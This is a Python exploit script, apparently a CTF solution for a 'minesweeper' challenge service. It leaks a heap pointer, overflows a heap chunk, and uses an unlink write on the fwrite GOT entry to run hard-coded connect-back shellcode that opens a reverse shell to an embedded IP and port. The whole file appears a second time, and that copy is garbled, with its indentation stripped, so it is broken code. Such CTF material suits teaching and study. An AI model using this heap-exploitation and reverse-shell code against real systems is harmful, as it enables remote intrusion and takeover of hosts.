m1ghtym0/minesweeper.py

## minesweeper.py
from pwn import *
import sys

"""
Unpack the binary with upx -d
"""
BINARY = "./minesweeper"

# Set context for asm
context.clear()
context(os='linux', arch='i386', bits=32)
#context.log_level = 'debug'

# connect-back shell                                                                          |    IP        |        | Port |
shell_code = "\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\x83\xbc\x1e\x41\x66\x68\x7a\x69\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\x6a\x02\x59\x87\xda\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x41\x89\xca\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"


def read_menu(r):
    r.recvuntil('(Quit)\n')

def init(r, val, content):
    r.sendline('I')
    r.recvline()
    r.sendline(val)
    r.recvuntil('by the character X\n')
    r.sendline(content)

def mal_unlink(what, where):
    payload = ''
    payload += p32(what)
    payload += p32(where-4)
    return payload

def shellcode():
    shellcode = ''
    shellcode += '\xeb\x0b'
    shellcode += '\x90'*11
    shellcode += shell_code
    return shellcode

def leak(r):
    r.sendline('N')
    r.recvuntil('game (Q)\n')
    r.sendline('V')
    r.recvlines(5)
    r.recvline() # padding
    r.recvlines(2) # size
    bwd = r.recvlines(2) # bwd
    r.sendline('Q')
    read_menu(r)
    bwd_ptr = u32(bwd[0]+bwd[1])
    return bwd_ptr

def exploit(r, elf, libc, local):
    # leak heap-addr
    init(r, 'B 2 5', 'X'*10)
    bwd_ptr = leak(r)
    heap_base = bwd_ptr & ~0xfff
    target_addr = heap_base | 0x0fc
    log.info('bwd-ptr {}'.format(hex(bwd_ptr)))
    log.info('target_addr {}'.format(hex(target_addr)))
    pause()

    # overflow chunk
    payload = ''
    payload += shellcode()
    payload = payload.ljust(0xcc, 'X') # 0x414-0x024
    payload += p32(0x12)
    payload += mal_unlink(what=target_addr, where=elf.got['fwrite'])
    payload = payload.ljust(0x130, 'A')
    init(r, 'B 3 101', payload)

    # trigger shellcode
    log.info('Connects back to IP:PORT specified in shell-code')
    log.success('BUMMMOOO!')
    pause()

if __name__ == "__main__":

    elf = ELF(BINARY)

    if len(sys.argv) < 2:
        print "Usage: {} local|docker|remote".format(sys.argv[0])
        sys.exit(1)
    elif sys.argv[1] == 'remote':
        H,P = ("pwn.chal.csaw.io", 7478)
        r = remote(H,P)
        libc = None
        exploit(r, elf, libc, local=False)
    else:
        if sys.argv[1] == 'local':
            p = process(BINARY)
            print "PID: {}".format(util.proc.pidof(p))
            pause()
            r = remote('localhost', 31337)
            libc = None
        else:
            r = process(BINARY, env = {"LD_PRELOAD" : LIBC})
            libc = None
        exploit(r, elf, libc, local=True)
	from pwn import *
	import sys

	"""
	Unpack the binary with upx -d
	"""
	BINARY = "./minesweeper"

	# Set context for asm
	context.clear()
	context(os='linux', arch='i386', bits=32)
	#context.log_level = 'debug'

	# connect-back shell \| IP \| \| Port \|
	shell_code = "\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\x83\xbc\x1e\x41\x66\x68\x7a\x69\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\x6a\x02\x59\x87\xda\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x41\x89\xca\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"


	def read_menu(r):
	r.recvuntil('(Quit)\n')

	def init(r, val, content):
	r.sendline('I')
	r.recvline()
	r.sendline(val)
	r.recvuntil('by the character X\n')
	r.sendline(content)

	def mal_unlink(what, where):
	payload = ''
	payload += p32(what)
	payload += p32(where-4)
	return payload

	def shellcode():
	shellcode = ''
	shellcode += '\xeb\x0b'
	shellcode += '\x90'*11
	shellcode += shell_code
	return shellcode

	def leak(r):
	r.sendline('N')
	r.recvuntil('game (Q)\n')
	r.sendline('V')
	r.recvlines(5)
	r.recvline() # padding
	r.recvlines(2) # size
	bwd = r.recvlines(2) # bwd
	r.sendline('Q')
	read_menu(r)
	bwd_ptr = u32(bwd[0]+bwd[1])
	return bwd_ptr

	def exploit(r, elf, libc, local):
	# leak heap-addr
	init(r, 'B 2 5', 'X'*10)
	bwd_ptr = leak(r)
	heap_base = bwd_ptr & ~0xfff
	target_addr = heap_base \| 0x0fc
	log.info('bwd-ptr {}'.format(hex(bwd_ptr)))
	log.info('target_addr {}'.format(hex(target_addr)))
	pause()

	# overflow chunk
	payload = ''
	payload += shellcode()
	payload = payload.ljust(0xcc, 'X') # 0x414-0x024
	payload += p32(0x12)
	payload += mal_unlink(what=target_addr, where=elf.got['fwrite'])
	payload = payload.ljust(0x130, 'A')
	init(r, 'B 3 101', payload)

	# trigger shellcode
	log.info('Connects back to IP:PORT specified in shell-code')
	log.success('BUMMMOOO!')
	pause()

	if __name__ == "__main__":

	elf = ELF(BINARY)

	if len(sys.argv) < 2:
	print "Usage: {} local\|docker\|remote".format(sys.argv[0])
	sys.exit(1)
	elif sys.argv[1] == 'remote':
	H,P = ("pwn.chal.csaw.io", 7478)
	r = remote(H,P)
	libc = None
	exploit(r, elf, libc, local=False)
	else:
	if sys.argv[1] == 'local':
	p = process(BINARY)
	print "PID: {}".format(util.proc.pidof(p))
	pause()
	r = remote('localhost', 31337)
	libc = None
	else:
	r = process(BINARY, env = {"LD_PRELOAD" : LIBC})
	libc = None
	exploit(r, elf, libc, local=True)